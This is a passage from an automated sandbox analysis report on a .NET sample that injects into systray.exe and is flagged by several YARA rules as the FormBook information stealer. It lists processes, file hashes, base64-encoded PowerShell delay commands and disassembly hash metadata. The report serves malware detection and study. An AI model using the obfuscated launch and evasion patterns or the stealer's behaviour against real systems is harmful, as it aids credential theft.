                                                                            Commandline:"C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
                                                                            Imagebase:0x250000
                                                                            File size:692224 bytes
                                                                            MD5 hash:F296A60E1568722B060DE70B46357FE6
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 13%, ReversingLabs
                                                                            Reputation:low

                                                                            General

                                                                            Target ID:8
                                                                            Start time:09:11:05
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\SysWOW64\systray.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\systray.exe
                                                                            Imagebase:0xea0000
                                                                            File size:9728 bytes
                                                                            MD5 hash:1373D481BE4C8A6E5F5030D2FB0A0C68
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            Reputation:moderate

                                                                            General

                                                                            Target ID:9
                                                                            Start time:09:11:07
                                                                            Start date:21/03/2023
                                                                            Path:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
                                                                            Imagebase:0x160000
                                                                            File size:692224 bytes
                                                                            MD5 hash:F296A60E1568722B060DE70B46357FE6
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Reputation:low

                                                                            General

                                                                            Target ID:10
                                                                            Start time:09:11:33
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                            Imagebase:0xdd0000
                                                                            File size:430592 bytes
                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Reputation:high

                                                                            General

                                                                            Target ID:11
                                                                            Start time:09:11:33
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7fcd70000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language

                                                                            General

                                                                            Target ID:12
                                                                            Start time:09:11:43
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                            Imagebase:0xdd0000
                                                                            File size:430592 bytes
                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:.Net C# or VB.NET

                                                                            General

                                                                            Target ID:13
                                                                            Start time:09:11:44
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7fcd70000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language

                                                                            General

                                                                            Target ID:14
                                                                            Start time:09:11:58
                                                                            Start date:21/03/2023
                                                                            Path:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            Imagebase:0xa30000
                                                                            File size:692224 bytes
                                                                            MD5 hash:F296A60E1568722B060DE70B46357FE6
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language

                                                                            General

                                                                            Target ID:16
                                                                            Start time:09:12:09
                                                                            Start date:21/03/2023
                                                                            Path:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            Imagebase:0x950000
                                                                            File size:692224 bytes
                                                                            MD5 hash:F296A60E1568722B060DE70B46357FE6
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language

                                                                            Disassembly

                                                                            Reset < >

                                                                              Executed Functions

                                                                              Function 016C6AA0 Relevance: .7, Instructions: 690COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 770f51c1a8aad5f6a0f059be9b9f740ccfc2813a7e82ddae285d4bfc096651ea
                                                                              • Instruction ID: dd13d3e6cc61441ad454bfd2351c9b8fb46f7437eaaf7fd566ffc8558d9f476b
                                                                              • Opcode Fuzzy Hash: 770f51c1a8aad5f6a0f059be9b9f740ccfc2813a7e82ddae285d4bfc096651ea
                                                                              • Instruction Fuzzy Hash: 7A42E231A002199FDB10EF69CC84BADBBB6FF94B00F1485A9D50AAB350DB309D45DFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C5317 Relevance: .6, Instructions: 554COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: db8a7bd14b12e5b8cc3854a7319194b6810e17ffa887d60a9d02d523214d23f3
                                                                              • Instruction ID: 11c7006637a0557fa5fc6570d0397fef1bb98a574051db79c4f5ad51b97d57df
                                                                              • Opcode Fuzzy Hash: db8a7bd14b12e5b8cc3854a7319194b6810e17ffa887d60a9d02d523214d23f3
                                                                              • Instruction Fuzzy Hash: D8321071A0015C8FCB54EBB8C860B9E7BB6FF54700F5085AAD10BAB260DF355E85AF61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C5390 Relevance: .5, Instructions: 506COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 902ec2d08be03546eb6c3feadcc1f041c72e7346b2283ee2b8011c02623d9e27
                                                                              • Instruction ID: 3fa9d50c4e5663df54e56b6d26f90fa2261576275e4acc6695ac17bddef517d9
                                                                              • Opcode Fuzzy Hash: 902ec2d08be03546eb6c3feadcc1f041c72e7346b2283ee2b8011c02623d9e27
                                                                              • Instruction Fuzzy Hash: 2022D071A0011C8FCB55EFA8C860B9E7BB6FF54700F5081AAD10B6B260DF355E859FA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C3A90 Relevance: 2.1, Strings: 1, Instructions: 868COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: \q
                                                                              • API String ID: 0-896574350
                                                                              • Opcode ID: 129c15d07700ce0071674292ab5a75b5dd3932b7b08086207dc716427c254e6d
                                                                              • Instruction ID: 4f9de4ce31e9f08ffe6c79f5d2a12990e3dcda31a8b700a7296dbfe09f55ef4d
                                                                              • Opcode Fuzzy Hash: 129c15d07700ce0071674292ab5a75b5dd3932b7b08086207dc716427c254e6d
                                                                              • Instruction Fuzzy Hash: 6B7216347002098FCB55ABB9C8A8A6D7BF6FF88B04F504069E607DB3B5DE71AC459B11
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C8E69 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: P3el
                                                                              • API String ID: 0-2431269350
                                                                              • Opcode ID: 474d48cf4b485d090e9aafa151b4872ff563c92f9b6074757779d801694d4424
                                                                              • Instruction ID: c862a8e686aa92f8d97cfccc934afb0085e2c74a4a82a304a2a3f35ba97eba52
                                                                              • Opcode Fuzzy Hash: 474d48cf4b485d090e9aafa151b4872ff563c92f9b6074757779d801694d4424
                                                                              • Instruction Fuzzy Hash: 5631B230A01204DFCB58EB78C8556AE7BF6EF4A604F54447EE106EB391DF38AC058BA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C6157 Relevance: .3, Instructions: 338COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3c8a1c6aa4b20c0acdb20c857b06ace8186b6083a1708f55f9bd7ad663b56f48
                                                                              • Instruction ID: cc451de4f9e7211d20450be25e66b141df1aa303b249ad1d0ecb69f382c3fccd
                                                                              • Opcode Fuzzy Hash: 3c8a1c6aa4b20c0acdb20c857b06ace8186b6083a1708f55f9bd7ad663b56f48
                                                                              • Instruction Fuzzy Hash: BBD16835B002449FCB15DBA8C899AAEBBF6FF88701F14806AE906EB351DF319C45DB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C8B17 Relevance: .2, Instructions: 160COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a1d442759dbb4fa85caaf80789281fdcf0bbf3ea4266508549f8c0b9537763aa
                                                                              • Instruction ID: 9ecdc013b465db1e9909641bdfb28cb69d1e20cba25ed3a193cd59001e422aea
                                                                              • Opcode Fuzzy Hash: a1d442759dbb4fa85caaf80789281fdcf0bbf3ea4266508549f8c0b9537763aa
                                                                              • Instruction Fuzzy Hash: 4751D1717003418FD724EF34D89566EBBA6FF94700B14892DE4868B395DF34AC0ADBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C8B57 Relevance: .1, Instructions: 131COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 67d3cfeed990c01ff11cb21db333de82b816901bff40dc61db7ecd47aa6b3296
                                                                              • Instruction ID: 154784850bd70055ac2fa729760ba3de325cccb3eefa1f26ce01f5e622f85d6f
                                                                              • Opcode Fuzzy Hash: 67d3cfeed990c01ff11cb21db333de82b816901bff40dc61db7ecd47aa6b3296
                                                                              • Instruction Fuzzy Hash: BB41BD71700245CFDB24EF34D89566DBBA2FF84700B24892DD8868B395DF74AD0ADBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C81C8 Relevance: .1, Instructions: 128COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3f25c74342961f5fd156d6e320ce125e53820e95bad3500e076594ccc54823e7
                                                                              • Instruction ID: afe21b9c0d88f466c884b8e1811136630e354943b644bc5084d748b0149705b6
                                                                              • Opcode Fuzzy Hash: 3f25c74342961f5fd156d6e320ce125e53820e95bad3500e076594ccc54823e7
                                                                              • Instruction Fuzzy Hash: 99413934B11614DFCB25DFA8D894AAEBBB6FF89700F104558E946AB361DB31EC01CB94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C71A8 Relevance: .1, Instructions: 122COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 47405870dfd3376a2cfd3f88e94262f410f08f3a5590b3a8b78f08cf25307ed8
                                                                              • Instruction ID: d913a44055327a9088323f4795394c57a4f2a8c1c9e53bc11f296d98586cdd78
                                                                              • Opcode Fuzzy Hash: 47405870dfd3376a2cfd3f88e94262f410f08f3a5590b3a8b78f08cf25307ed8
                                                                              • Instruction Fuzzy Hash: 2C316D717001065FDB08EE68DC95DBFB7BAEBC4B00710882CEA06DB255EF70AC0187A5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C81B1 Relevance: .1, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0ee7cb13b8235ae7c7b92a327bdb2908d247c124e4aeec30bd04ddcc91193936
                                                                              • Instruction ID: aca7110d720b947a396bdf8a242e3f60ead4d602fb58cec595fca0852bff5aae
                                                                              • Opcode Fuzzy Hash: 0ee7cb13b8235ae7c7b92a327bdb2908d247c124e4aeec30bd04ddcc91193936
                                                                              • Instruction Fuzzy Hash: E0417C74A11714DFCB25CFA8D894AAEBBB6FF89700F104459E542AB361DB35ED01CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C8BB0 Relevance: .1, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d37b9b38811e4e351fdb2cdeaba90b77ea498e96de3871693390dd16eedf8781
                                                                              • Instruction ID: 7e26e5d358dc983c04cc0db4dae791a67ae2a014e30660ad192692a98b22c654
                                                                              • Opcode Fuzzy Hash: d37b9b38811e4e351fdb2cdeaba90b77ea498e96de3871693390dd16eedf8781
                                                                              • Instruction Fuzzy Hash: 2E418D70700205CFCB24EF34D89592EBBA2FF88710B10892DE9469B395DF74BC099BA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C6541 Relevance: .1, Instructions: 99COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: becf298d4ce87fa2c447a7a632651526e9138c1d24e0e6d2479353f1674dc838
                                                                              • Instruction ID: a753d69a70b2b808a02944c7ca3502d9b5fa576c0a10f14bc4cf1f5219a985f5
                                                                              • Opcode Fuzzy Hash: becf298d4ce87fa2c447a7a632651526e9138c1d24e0e6d2479353f1674dc838
                                                                              • Instruction Fuzzy Hash: 87316D70A002049FCB14DF69D995AAEBBF6FF88714F108429E506E7390DF719C05CB94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C0F00 Relevance: .1, Instructions: 96COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 37fd3588ca2515214b3e30acc96cd6017287792e6eb41001ec55357dbea5dc2c
                                                                              • Instruction ID: 7f03a8afe5daaf41aaf86dc5cfd0c9677f0ab2925e6886f71fea2cda8c21200e
                                                                              • Opcode Fuzzy Hash: 37fd3588ca2515214b3e30acc96cd6017287792e6eb41001ec55357dbea5dc2c
                                                                              • Instruction Fuzzy Hash: 0931D9307047019BD314DB2DC890A6B7BE6EFC5B54F24856DE4AA8B391DF71AC42CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C8FA6 Relevance: .1, Instructions: 85COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 66fdb1dec5762ac39763b15a65cf4f21269d45881e6b6d3429a1703499e8370b
                                                                              • Instruction ID: 1ed13759e89031dd5d95bdb2c92d03fcce77e9a17e69b94fba1e8347b5c92351
                                                                              • Opcode Fuzzy Hash: 66fdb1dec5762ac39763b15a65cf4f21269d45881e6b6d3429a1703499e8370b
                                                                              • Instruction Fuzzy Hash: A93116B1D00248DFDB14CFA9C984AEEBFF5EF48704F14842DE419AB250DB799945CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C0888 Relevance: .1, Instructions: 83COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 97d5bedf4f507b420cd16989ceee139e256312008d8c6a25c593038c521f9207
                                                                              • Instruction ID: 1956f3ff07ade5322d88c3acc9c332d313232424696c7d5f8085055b8ba2338d
                                                                              • Opcode Fuzzy Hash: 97d5bedf4f507b420cd16989ceee139e256312008d8c6a25c593038c521f9207
                                                                              • Instruction Fuzzy Hash: D021E3342043418FC355AB78D49896EBBEBFFD075C744C919C5878B2A8CF716C0A97AA
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C8FB0 Relevance: .1, Instructions: 83COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 35f2e311292167f374f09b1beea9e20c22d1b6ac547f098d9f79e8e7ce47a4f0
                                                                              • Instruction ID: 326dbc936fde82b102c309d96eea8065e45151eb15b62f52b41db395ec2d5240
                                                                              • Opcode Fuzzy Hash: 35f2e311292167f374f09b1beea9e20c22d1b6ac547f098d9f79e8e7ce47a4f0
                                                                              • Instruction Fuzzy Hash: 8F3128B0D00248DFDB14CFAAC980AEEBFF5EF48700F14842DE419AB250DB799941CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C7FE8 Relevance: .1, Instructions: 81COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 49c3fa29d9f3f1a9b0ba0f5b6a91b57a5476cf5df25c41a414db827523462b7b
                                                                              • Instruction ID: 5f1c9cbd262388cccee087886f103f00c5ac17cee831c4067cec25571c50fc97
                                                                              • Opcode Fuzzy Hash: 49c3fa29d9f3f1a9b0ba0f5b6a91b57a5476cf5df25c41a414db827523462b7b
                                                                              • Instruction Fuzzy Hash: D5113A323002155BC754A77DAC5097EB78BFFC1B69B008A3DD90E8B284DF619C0A83A5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0135D4EC Relevance: .1, Instructions: 75COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.381709838.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_135d000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d23579d2aabac936cc6aa6c7300708044fd26ccbaab0ead674effd097a027a70
                                                                              • Instruction ID: e0e331d8ab745ec8328d656a3e8a66d8c7296606ba02e4608edadd6b55ee9188
                                                                              • Opcode Fuzzy Hash: d23579d2aabac936cc6aa6c7300708044fd26ccbaab0ead674effd097a027a70
                                                                              • Instruction Fuzzy Hash: 792128B1504244DFDB45DF94D9C0F26BF65FB88B2CF248969EC060B606C336D846C7A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C8355 Relevance: .1, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 754d476c4c19a12ec5f40472778e3557c3497a1d94967001adcd33da7a6b34b2
                                                                              • Instruction ID: 1d30f3cbd11e8a390d18bddb4514b2a3043b04dcc8bc9ebe7bbead0f38549d37
                                                                              • Opcode Fuzzy Hash: 754d476c4c19a12ec5f40472778e3557c3497a1d94967001adcd33da7a6b34b2
                                                                              • Instruction Fuzzy Hash: B121A435E147958FCB01DF79C8806DEBBF1FF9A300B5142DAE444AB212D371AA46CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C46C0 Relevance: .1, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 814a21fe0aed810f719580cb1e2d1cd4e2c2c3182589ded034a3a83a11222af2
                                                                              • Instruction ID: 37d94e233f134012577ba42e9d64fff3f214fcb9fdc13a0b879dcd0751cfbb1a
                                                                              • Opcode Fuzzy Hash: 814a21fe0aed810f719580cb1e2d1cd4e2c2c3182589ded034a3a83a11222af2
                                                                              • Instruction Fuzzy Hash: 9C11A2347006008FC714DF6CC95096B7BE6EB89B54724896DD59ACB395EF31EC068B50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C6987 Relevance: .1, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_16c0000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 613501827e691dd7b2433a27af2df6b72cad65d666172e48ea4fccf39ba680eb
                                                                              • Instruction ID: 9f6dda912541c0b4ac30f69a4eb217a1ae5afe337b0ffa645220361fe5aed5f0
                                                                              • Opcode Fuzzy Hash: 613501827e691dd7b2433a27af2df6b72cad65d666172e48ea4fccf39ba680eb
                                                                              • Instruction Fuzzy Hash: 2511C833E61309A6D700BBADDC457CDB766EFE5B00F658521E50177180DBB07049D2EA
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 016C0D98 Relevance: .1, Instructions: 61COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.382521461.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
